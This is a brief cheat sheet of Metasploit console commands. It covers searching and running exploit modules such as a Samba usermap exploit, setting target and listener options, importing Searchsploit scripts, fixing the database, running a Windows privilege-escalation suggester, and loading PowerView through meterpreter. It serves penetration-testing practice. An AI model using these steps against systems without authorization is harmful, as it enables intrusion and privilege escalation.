TLDRBins / Metasploit



Start Msfconsole

msfconsole -q

General

# Return to previous page
back
# Upgrade session
sessions -u
# Quit
exit

Search Exploit

search <KEYWORD>
Example: search samba
use <NUM>
Example: use 15
# Choose by full path
use <MODULE_PATH>
Example: use exploit/multi/samba/usermap_script
# Show exploit settings
options
# Set option, e.g.
set rhosts <TARGET>
set lhost <LOCAL_IP>
set lport <LOCAL_PORT>
# Run exploit
run

Hint: If a session has opened but you are sitting at an empty line, just type your command and press Enter.

Add Scripts from Searchsploit

mkdir -p ~/.msf4/modules/exploits/linux
mkdir -p ~/.msf4/modules/exploits/windows
# For example a linux script
cp <SCRIPT> ~/.msf4/modules/exploits/linux
Example: cp 12345.rb ~/.msf4/modules/exploits/linux
# Inside msfconsole
reload_all
# Search
search <SCRIPT>

Fix No Search Result

# Inside msfconsole, check db status
db_status
# In a shell, start and enable PostgreSQL, then initialise the database
sudo service postgresql start
sudo update-rc.d postgresql enable
sudo msfdb init
# Go back to msfconsole and check again
db_status

General

# Return from meterpreter
background

Use Exploit

# Quick look at potential privesc (Windows)
# Need to return from meterpreter
use post/multi/recon/local_exploit_suggester
# Select opened session
set session 1
# Show exploit settings
options
# Set option, e.g.
set rhosts <TARGET>
# Run exploit
run

Use Powershell Module

# Use powershell module
use powershell
# Import module
powershell_import /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
# Spawn powershell session
powershell_shell